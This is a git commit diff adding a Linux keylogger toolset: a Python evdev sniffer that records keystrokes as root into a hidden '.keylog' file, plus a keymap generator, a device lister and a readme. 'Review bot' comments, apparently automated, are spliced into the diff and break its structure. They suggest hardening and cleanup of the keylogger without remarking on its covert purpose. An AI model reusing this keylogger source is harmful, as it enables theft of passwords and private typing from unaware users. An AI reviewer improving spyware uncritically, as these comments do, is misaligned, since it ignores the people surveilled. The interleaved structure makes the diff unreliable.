commit f673c4b83e24a3d580cee4cf6b6268d3fdc63e45
Author: your-favorite-hacker
Date: Fri May 29 22:53:17 2015 +0200
added event_sniffer
diff --git a/evdev_sniffer.py b/evdev_sniffer.py
new file mode 100755
index 0000000..59efad5
--- /dev/null
+++ b/evdev_sniffer.py
@@ -0,0 +1,80 @@
+#!/usr/bin/env python2
+#
+# ufh 2015
+#
+
+import os
+import sys
+import evdev
+import argparse
+
+def rootCheck():
+ uid=os.getuid()
+ if uid != 0:
+ print '[*] You need r00t privileges to open event0'
+ return False
+ return True
+
+def run(args):
+
+ if not rootCheck():
+ sys.exit(1)
+
+ fw = open(args.outfile,'wb')
+
+ dList = evdev.list_devices()
+ try:
+ dList.index(args.device)
+
+ except ValueError, e:
+ print 'Problem opening input: ',e
+ sys.exit(1)
+
+ dev = evdev.InputDevice(args.device)
+ name = dev.name
+ phys = dev.phys
+ print '[*] Found %s@%s' % (name,phys )
+
+ for e in dev.read_loop():
+ if e.type == evdev.ecodes.EV_KEY:
+
+ # get the categorzied object
+ ek = evdev.categorize(e)
+ # key_down
+ if ek.keystate == 1:
+ # print to console
+ if args.output:
+ print ek.keycode
+
+ # bring it in the right format
+ data = "%s" % ek.keycode
+ data = data.split('_')[1]
+ if data == 'SPACE' or data == 'BACKSPACE' or data == 'TAB' or data == 'ENTER':
+ data = ' %s ' % data
+ else:
+ data = '%s' % data
+ data = data.lower()
+
+ fw.write(data)
+ fw.flush()
+
+ fw.close()
+
+def main():
+ parser_desc = 'event keyboard sniffer'
+ prog_desc = 'event_sniffer.py'
+ parser = argparse.ArgumentParser( prog = prog_desc, description = parser_desc)
+ parser.add_argument('-o','--outfile',dest='outfile',required=False,action='store',help='where to write the sniffed data')
+ parser.add_argument('-d','--device',dest='device',required=False,action='store',help='different event device to sniff')
+ parser.add_argument('-O','--output',dest='output',required=False,action='store',help='print logged characters to screen')
+ args = parser.parse_args()
+ if not args.device:
+ args.device = '/dev/input/event0'
+
+ if not args.outfile:
+ args.outfile = '.keylog'
+
+ run(args)
+
+if __name__ == '__main__':
+ main()
diff --git a/gen_keymap.sh b/gen_keymap.sh
new file mode 100755
index 0000000..6c74998
--- /dev/null
+++ b/gen_keymap.sh
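Review bot: `run()` in evdev_sniffer.py opens the log with `fw = open(args.outfile,'wb')` while running as root, and the default `.keylog` is a relative path, so the write follows any symlink already present under that name in the working directory and a newly created file gets umask-default permissions although it holds raw keystrokes. Opening it with `fd = os.open(args.outfile, os.O_WRONLY|os.O_CREAT|os.O_TRUNC|os.O_NOFOLLOW, 0o600)` followed by `fw = os.fdopen(fd,'wb')` keeps a new file owner-only and refuses a symlinked target. The open also happens before the device is validated, so a bad `-d` value still truncates the output file; moving it below the `dList.index(args.device)` check avoids that. `-O/--output` is registered with `action='store'` and therefore requires a value, while its help text describes a switch; `action='store_true'` matches the intent. `fw.close()` after the `read_loop()` loop is not reached when the loop is interrupted, so a `try/finally` around the loop is the safer shape.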
@@ -0,0 +1,8 @@
+#!/bin/sh
+#
+# run as root, uses dumpkeys
+#
+echo 'ev1l blackh4t t00l - just kidding'
+echo "myDict={\\"
+dumpkeys |grep "^keycode"|sed -e 's/ / /g'|sed -e 's/ / /g'|cut -d ' ' -f 2,4|sed 's/ /:\"/g'|sed -e 's/$/\",/g'|tr -d '\n'
+echo "}"
diff --git a/map_devices.py b/map_devices.py
new file mode 100755
index 0000000..d66cff9
--- /dev/null
+++ b/map_devices.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python2
+# script for printing device information of /dev/input/event* devices
+#
+
+import os
+import sys
+import evdev as ev
+
+def checkRoot():
+ if os.getuid()!=0:
+ print '[*] You need root for that'
+ return False
+ return True
+
+if not checkRoot():
+ sys.exit(1)
+
+devList = ev.list_devices()
+devList.reverse()
+for inp in devList:
+ dev = ev.InputDevice(inp)
+ print "-"*60
+ print "[%s]" % inp
+ print "%s\n%s\n%s" % (dev.name, dev.info,dev.phys)
+print "-"*60
diff --git a/readme.txt b/readme.txt
new file mode 100644
index 0000000..bffd8fd
--- /dev/null
+++ b/readme.txt
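Review bot: The banner `echo 'ev1l blackh4t t00l - just kidding'` in gen_keymap.sh is written to stdout ahead of `myDict={`, so if the output is redirected into a file meant to be read as Python, its first line is not valid Python; sending the banner to stderr with `>&2` keeps the generated dict clean. The opening and closing braces are printed whether or not `dumpkeys` ran, so a missing binary or a failing run produces an empty `myDict` and a zero exit status; a guard such as `command -v dumpkeys >/dev/null || exit 1` before the first `echo` makes the failure visible. The values are wrapped in double quotes without escaping, which presumably holds only while `dumpkeys` emits plain keysym names, and that assumption deserves a line in the header comment.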
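Review bot: `checkRoot()` in map_devices.py gates on `os.getuid()!=0`, the real uid, although what actually decides access is whether the process can open the `/dev/input/event*` nodes, so a read-only listing insists on full root (`rootCheck()` in evdev_sniffer.py uses the same test). Letting the open decide, e.g. `try: dev = ev.InputDevice(inp)` with `except (IOError, OSError), e: print '[%s] %s' % (inp, e); continue`, follows least privilege and reports the real failure. The listing also executes at import time; putting it in a `main()` behind `if __name__ == '__main__':`, as evdev_sniffer.py does, would be consistent with the rest of the commit. Each `dev` is left open after printing, so a `dev.close()` at the end of the loop body would release the descriptor.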
@@ -0,0 +1,52 @@
+event toolset
+=============
+
+little toolset for logging information from /dev/input/event* devices.
+for the sniffer i first opened the device by myself and parsed it, it worked. but worked much
+better with the evdev library.
+please be aware that root privs are needed.
+
+prerequisites
+-------------
+https://python-evdev.readthedocs.org/en/latest/
+pip2 install evdev
+
+map_devices.py
+--------------
+just print out information about all event devices on your system.
+# python2 map_devices.py
+[...]
+------------------------------------------------------------
+[/dev/input/event14]
+Video Bus
+bus: 0019, vendor 0000, product 0006, version 0000
+LNXVIDEO/video/input0
+------------------------------------------------------------
+[/dev/input/event15]
+SynPS/2 Synaptics TouchPad
+bus: 0011, vendor 0002, product 0007, version 01b1
+isa0060/serio1/input0
+------------------------------------------------------------
+[...]
+
+evdev_sniffer.py
+----------------
+keyboard sniffer using the evdev library. write per default the logged data to .keylog ;)
+
+gen_keymap.sh
+-------------
+simple shellscript generating keymap for event_sniffer.py
+event_sniffer is not using the evdev library, so it is more independent.
+
+event_sniffer.py
+----------------
+well like evdev_sniffer but without the evdev_library :)
+
+thanks
+------
+thanks goes out to stealth for pointing me to this neat trick, he implemented back then via injectso.
+(http://stealth.openwall.net/local/injectso-0.52.tgz)
+
+author
+------
+dash@hack4.org